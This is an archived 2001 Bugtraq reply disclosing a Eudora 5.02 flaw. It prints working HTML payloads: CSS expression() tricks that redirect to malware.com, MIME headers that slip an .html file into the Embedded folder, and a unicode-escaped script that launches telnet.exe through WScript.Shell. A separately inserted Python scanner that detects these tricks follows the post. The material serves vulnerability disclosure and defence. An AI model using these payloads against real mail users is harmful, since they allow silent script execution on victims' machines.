Bugtraq mailing list archives
Re: feeble.you!dora.exploit
From: "http-equiv () excite com" <http-equiv () excite com>
Date: Wed, 21 Mar 2001 07:48:28 -0800
Further to all of this, we include a generic, more illustrative (and user-friendly, tested, working example) [at the end of this batch of quotes]. This defeats the so-called "Allow executables in HTML content" being disabled. Example at the end of this screed.

On Tue, 20 Mar 2001 11:23:48 -0800 (PST), http-equiv () excite com wrote:
|
| Jeff Beckley wrote:
|
| >At 01:38 AM 3/18/2001 -0800, http-equiv () excite com wrote:
| >Silent delivery and installation of an executable on a target
| >computer. No client input other than opening an email using
| >Eudora 5.02 - Sponsored Mode provided 'use Microsoft viewer'
| >and 'allow executables in HTML content' are enabled.
|
| The "Allow executables in HTML content" setting is turned off by
| default. The online help and user manual mention that the
| setting should remain off for security reasons.
|
| This of course is 100% correct. Unfortunately on closer
| examination we find that this too can be defeated quite easily.
| Consider the following non-JavaScript:
|
| <!doctype html public "-//w3c//dtd html 4.0 transitional//en">
|
| <img SRC="file://C:\WINDOWS\APPLIC~1\QUALCOMM\EUDORA\Embedded\malware.gif"
| height=2 width=2
| STYLE="left:expression(location.href='http://www.malware.com');"></html>
|
| <br>
| <br>
| </body></html>
|
| This slips through, with "Allow executables in HTML content"
| disabled. Therefore the results will be the same:
|
| <img SRC="" height=1 width=1
| STYLE="left:expression (malware.location.href='cid:malware.com');"></
|
| ...etc
|
| Disable the 'Microsoft Viewer' thing. That's the problem.
|
| A good repair can be by reviewing all the necessary tricks to inject
| JavaScript into Hotmail Accounts. These are well documented here and dating
| back for quite some time. It appears the mail client seeks typical script
| tags, which is defeated as above.
| Additionally, you might want to not allow a
| crafted inline file to transfer automatically to your embedded folder:
|
| Content-Type: application/octet-stream; charset=iso-8859-1
| Content-ID: <malware.com>
| Content-Transfer-Encoding: base64
| Content-Disposition: inline; filename="You!DORA.html"
|
| We note that if the content-type is manipulated we can route the file to the
| 'Embedded' folder. Casual observation suggests image files and *.exe are
| routed there, while *.html is not, hence the constructed Content-Type:
| application/octet-stream; charset=iso-8859-1 while the file is:
| Content-Disposition: inline; filename="You!DORA.html"
|
| ---
| http://www.malware.com

This is specifically constructed to fire the ActiveX warning so that it is visually illustrated (harmless WSH to fire telnet if you click okay). REPEAT: this is by design and only for illustrative purposes (lest some idiot complain this demo has a warning and is a lame "exploit").

<img SRC="cid:malware.com" height=2 width=2 STYLE="left:expression(document.write('\u0020\u0020\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0020\u0076\u0061\u0072\u0020\u0077\u0073\u0068\u003d\u006e\u0065\u0077\u0020\u0041\u0063\u0074\u0069\u0076\u0065\u0058\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0027\u0057\u0053\u0063\u0072\u0069\u0070\u0074\u002e\u0053\u0068\u0065\u006c\u006c\u0027\u0029\u003b\u0020\u0020\u0077\u0073\u0068\u002e\u0052\u0075\u006e\u0028\u0027\u0074\u0065\u006c\u006e\u0065\u0074\u002e\u0065\u0078\u0065\u0027\u0029\u003b\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0020\u003c\u0021\u002d\u002d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u006d\u0061\u006c\u0077\u0061\u0072\u0065\u002e\u0063\u006f\u006d\u0020\u0032\u0032\u002e\u0030\u0032\u002e\u0030\u0031\u0020\u002d\u002d\u003e'))">

Once again: Tested on win98, IE5.5, "Eudora 5.0.2 -- Sponsored Mode", "Microsoft Viewer" enabled, "Allow executables in HTML content" DISABLED.
end call
---
http://www.malware.com
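The thread describes two things a mail client that only looks for script tags will miss: script carried in a CSS expression() inside a STYLE attribute (optionally hidden behind JavaScript \uXXXX escapes), and an inline MIME part whose declared Content-Type (application/octet-stream) does not match its filename extension (*.html). The scanner below is an added example written from the defender's side; it is not code from the original post or from Eudora. It parses a constructed sample message, flags STYLE attributes containing expression(, decodes the \u escapes so an analyst can see the hidden markup, and reports declared-type versus extension mismatches on inline parts. All part names, filenames and boundary strings in the sample are made up for the example.

```python
"""Scanner for CSS expression() script and MIME type/extension mismatches
in HTML e-mail.  Added example; sample message below is constructed."""
import mimetypes
import re
from email import message_from_string
from email.message import Message

# STYLE="..." attribute on any tag (case-insensitive).  The post shows both
# 'expression(' and 'expression (' so whitespace before '(' is allowed.
STYLE_ATTR_RE = re.compile(r'style\s*=\s*"([^"]*)"', re.IGNORECASE)
EXPRESSION_RE = re.compile(r'expression\s*\(', re.IGNORECASE)
# JavaScript \uXXXX escape as it appears literally in the attribute text.
UNICODE_ESC_RE = re.compile(r'\\u([0-9a-fA-F]{4})')


def decode_js_unicode_escapes(s: str) -> str:
    """Resolve JavaScript \\uXXXX escapes to the characters they denote."""
    return UNICODE_ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), s)


def find_css_expressions(html: str) -> list:
    """One finding per STYLE attribute that carries a CSS expression().

    Each finding keeps the raw style text and a decoded view with \\u escapes
    resolved, so a <script> element hidden in the escapes becomes visible.
    """
    findings = []
    for m in STYLE_ATTR_RE.finditer(html):
        style = m.group(1)
        if EXPRESSION_RE.search(style):
            decoded = decode_js_unicode_escapes(style)
            findings.append({
                "style": style,
                "decoded": decoded,
                "hidden_script": "<script" in decoded.lower(),
            })
    return findings


def find_mime_mismatches(msg: Message) -> list:
    """Flag parts whose declared Content-Type disagrees with the filename
    extension, e.g. application/octet-stream carrying a *.html file."""
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        filename = part.get_filename()
        if not filename:
            continue
        declared = part.get_content_type()
        expected, _ = mimetypes.guess_type(filename)
        if expected and expected != declared:
            findings.append({
                "filename": filename,
                "declared": declared,
                "expected": expected,
                "disposition": part.get_content_disposition(),
            })
    return findings


def scan_message(raw_message: str) -> dict:
    """Parse a raw RFC 822 message and run both checks over it."""
    msg = message_from_string(raw_message)
    expressions = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            charset = part.get_content_charset() or "utf-8"
            html = part.get_payload(decode=True).decode(charset, errors="replace")
            expressions.extend(find_css_expressions(html))
    return {"css_expressions": expressions, "mime_mismatches": find_mime_mismatches(msg)}


# Constructed sample: an HTML part with an escaped <script> inside a CSS
# expression, an octet-stream part named *.html, and a benign inline GIF.
SAMPLE_MESSAGE = """\
From: sender@example.invalid
To: recipient@example.invalid
Subject: constructed sample
MIME-Version: 1.0
Content-Type: multipart/related; boundary="BOUNDARY"

--BOUNDARY
Content-Type: text/html; charset=iso-8859-1

<html><body>
<img SRC="cid:part1" height=2 width=2
STYLE="left:expression(document.write('\\u003c\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003e'))">
</body></html>
--BOUNDARY
Content-Type: application/octet-stream; charset=iso-8859-1
Content-ID: <part1>
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="sample.html"

PGh0bWw+PC9odG1sPg==
--BOUNDARY
Content-Type: image/gif
Content-Disposition: inline; filename="logo.gif"

R0lGODlh
--BOUNDARY--
"""

if __name__ == "__main__":
    report = scan_message(SAMPLE_MESSAGE)
    for f in report["css_expressions"]:
        print("CSS expression in STYLE; decoded:", f["decoded"],
              "| hidden <script>:", f["hidden_script"])
    for f in report["mime_mismatches"]:
        print(f"type mismatch: {f['filename']} declared {f['declared']}, "
              f"expected {f['expected']} (disposition {f['disposition']})")
```

Run on the sample, it reports one STYLE attribute whose decoded expression contains a <script> element and one inline part (sample.html) declared as application/octet-stream where the extension implies text/html; the GIF part matches and is not reported. On real mail the same two checks can be run over the text/html part and every part carrying a filename.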
Current thread:
- feeble.you!dora.exploit http-equiv () excite com (Mar 19)
- Re: feeble.you!dora.exploit Jeff Beckley (Mar 20)
- Re: feeble.you!dora.exploit http-equiv () excite com (Mar 21)
- Re: feeble.you!dora.exploit http-equiv () excite com (Mar 21)
- Re: feeble.you!dora.exploit Jeff Beckley (Mar 22)